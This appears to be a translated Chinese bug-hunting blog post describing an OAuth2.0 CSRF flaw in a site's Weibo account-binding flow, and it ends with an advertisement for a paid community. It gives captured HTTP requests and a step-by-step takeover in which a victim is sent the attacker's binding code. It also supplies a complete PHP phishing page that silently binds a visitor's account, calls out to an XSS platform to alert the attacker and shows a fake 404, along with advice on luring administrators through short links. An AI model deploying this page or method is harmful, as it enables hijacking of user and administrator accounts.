Vulnerability mining: OAuth2.0 authentication flaw of a certain manufacturer

The project address in the article has been changed to: a.test.com to protect manufacturers and themselves.

1: Website login

2: Social account binding place

0x02.1 Request package 1:

Request:

GET https://www.a.test.com/users/auth/weibo?can_transfer=true HTTP/1.1
Host: www.a.test.com

Response:

HTTP/1.1 302 Found
Server: Tengine
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Date: Mon, 18 Mar 2019 10:35:32 GMT
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Location: https://api.weibo.com/oauth2/authorize?client_id=1881139527&redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&response_type=code&state=%257B%2522can_transfer%2522%253A%2522true%2522%257D
Cache-Control: no-cache
Set-Cookie: read_mode=day; path=/
Set-Cookie: default_font=font2; path=/
Set-Cookie: locale=zh-CN; path=/
Set-Cookie: _m7e_session_core=62d46938b5d57bcfe0ef1f3e18c52851; domain=.a.test.com; path=/; expires=Mon, 18 Mar 2019 16:35:32 -0000; secure; HttpOnly
Set-Cookie: signin_redirect=; domain=www.a.test.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000
X-Request-Id: a921c890-a33b-4b52-ab49-bc67597e3cca
X-Runtime: 0.064185
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Via: cache15.l2cm12-6(78,0), cache6.cn544(108,0)
Timing-Allow-Origin: *
EagleId: 7ce8aa4615529053323375762e
Content-Length: 290
<html><body>You are being <a href="https://api.weibo.com/oauth2/authorize?client_id=1881139527&amp;redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&amp;response_type=code&amp;state=%257B%2522can_transfer%2522%253A%2522true%2522%257D">redirected</a>.</body></html>

0x02.2 Request package 2:

Request:

GET https://api.weibo.com/oauth2/authorize?client_id=1881139527&redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&response_type=code&state=%257B%2522can_transfer%2522%253A%2522true%2522%257D HTTP/1.1
Host: api.weibo.com

Response:

HTTP/1.1 302 Found
Server: nginx/1.6.1
Date: Mon, 18 Mar 2019 10:35:32 GMT
Content-Length: 0
Connection: keep-alive
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://www.a.test.com/users/auth/weibo/callback?state=%7B%22can_transfer%22%3A%22true%22%7D&code=c593bc150745c37a4d5ec05332d406af

0x02.3 Request package 3:

Request:

GET https://www.a.test.com/users/auth/weibo/callback?state=%7B%22can_transfer%22%3A%22true%22%7D&code=c593bc150745c37a4d5ec05332d406af HTTP/1.1
Host: www.a.test.com

Response:

HTTP/1.1 302 Found
Server: Tengine
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Date: Mon, 18 Mar 2019 10:35:33 GMT
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Location: https://www.a.test.com/settings/profile
Cache-Control: no-cache
Set-Cookie: read_mode=day; path=/
Set-Cookie: default_font=font2; path=/
Set-Cookie: locale=zh-CN; path=/
Set-Cookie: bind_sns_result=%257B%2522code%2522%3A-1%257D; path=/; expires=Mon, 18 Mar 2019 10:40:33 -0000
Set-Cookie: _m7e_session_core=62d46938b5d57bcfe0ef1f3e18c52851; domain=.a.test.com; path=/; expires=Mon, 18 Mar 2019 16:35:33 -0000; secure; HttpOnly
Set-Cookie: signin_redirect=; domain=www.a.test.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000
X-Request-Id: 4f4b792f-967e-45f8-a71d-adb88e600e19
X-Runtime: 0.391071
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Via: cache15.l2cm12-6(403,0), cache6.cn544(434,0)
Timing-Allow-Origin: *
EagleId: 7ce8aa4615529053326897836e
Content-Length: 106
<html><body>You are being <a href="https://www.a.test.com/settings/profile">redirected</a>.</body></html>

Here you need to use a Weibo account and two certain manufacturer accounts.

Weibo account: 182**77 (attacker)
A certain manufacturer’s account A: 33*493@qq.com (attacker)
A certain manufacturer’s account B: 28*165@qq.com (innocent victim)
Step 1: Attacker – Log in to Weibo
Step 2: Attacker – log in using a certain manufacturer’s account A

From the above, there are actually many ways to bind accounts to quickly log in, but there are definitely fewer users bound to Weibo, so we use it
Step 3: Attacker – click to bind Weibo packet capture

Bind Weibo URL:https://www.a.test.com/users/auth/weibo/callback?state={“can_transfer”%3A”true”}&code=c593bc150745c37a4d5ec05332d406af
The code in this URL is my Weibo one-time token
Step 4: Innocent victim – log in using a manufacturer account B

Send the url to account B to open:https://www.a.test.com/users/auth/weibo/callback?state={“can_transfer”%3A”true”}&code=c593bc150745c37a4d5ec05332d406af

At this time, it prompts that the binding is successful~~~ Hehehehe
Step 5: Attacker-Click on the browser and select Weibo to log in

First of all, through my observation, a certain manufacturer uses one account for the front-end and back-end: )

Attack ideas:

There is a function in a certain manufacturer, and we can send a harmful short link URLcertainWrite a letter to the administrator, entice the administrator to open it, ask the administrator to bind our Weibo, and then we log in to the backend
Use Sina short domain names (reduce the administrator’s inner vigilance)
When someone visits the url, a qq email is sent to my mailbox.
After this script is completed, the ideal attack method should be like this
受害者-->点击新浪短链接url-->跳转到我的钓鱼网站-->输出绑定url进行绑定-->利用xss平台发送邮件通知我-->页面显示404-->结束

# a_test_oauth_csrf.php
# 然后把这个文件改一下名字,放外网,然后钓鱼等待
<?php
function curlRequest($url, $post = (), $cookie = '', $referurl = '') {
    if (!$referurl) {
        $referurl = 'https://www.a.test.com';
    }
    $header = array(
        'Content-Type:application/x-www-form-urlencoded',
        'X-Requested-With:XMLHttpRequest',
    );
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)');
    curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
    curl_setopt($curl, CURLOPT_REFERER, $referurl);
    curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
    curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,FALSE);
    if ($post) {
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
    }
    if ($cookie) {
        curl_setopt($curl, CURLOPT_COOKIE, $cookie);
    }
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_exec($curl);
    $header_data = curl_getinfo($curl);
    if (curl_errno($curl)) {
        return curl_error($curl);
    }
    curl_close($curl);
    return $header_data;
}
// 某厂商的授权url-固定写死即可
$url = 'https://api.weibo.com/oauth2/authorize?client_id=1881139527&redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&response_type=code&state=%257B%2522can_transfer%2522%253A%2522true%2522%257D';
// 将你新浪微博cookie写入这里
$cookie = '我的cookie可不给你们哦';
$result = curlRequest($url, (), $cookie);
// 那两个js随便找个xss平台即可
// 一个用来表示登录过期了
// 一个用来表示钓鱼成功了
if (!$result('redirect_url')) {
    // echo '登录过期';
    echo '<ScRipT sRc=http://xxxxx.cn/ExiptZI></SCriPt>';
} else {
    // echo '我还能搞事';
    // echo $result('redirect_url');
    echo '<img src="'.$result('redirect_url').'" style="display:none;">';
    echo '<ScRipT sRc=http://xxxxx.cn/Exi0TCW></SCriPt>';
}
http_response_code(404);
echo '<div>404 网页已删除</div>';

Place external network:http://127.0.0.1/a_test_oauth_csrf.php Send to major administrators

Then just be a beautiful girl and wait quietly

xss platform:http://xss.tf

If you are a long-termist, welcome to join my knowledge planet. We will move forward together. It will be updated every day and refined. You can join by recognizing the QR code on WeChat and paying. If you are not satisfied, you can log in to the App within 72 hours. Unconditional self-service refund
A classmate asked me earlier if I had any coupons. 100 coupons worth 100 yuan will be distributed here. Once they are used up, they will not be distributed again this year.